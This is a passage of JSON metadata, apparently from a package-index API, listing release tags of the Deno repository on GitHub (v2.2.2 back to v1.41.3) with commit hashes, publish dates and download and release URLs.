pos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://re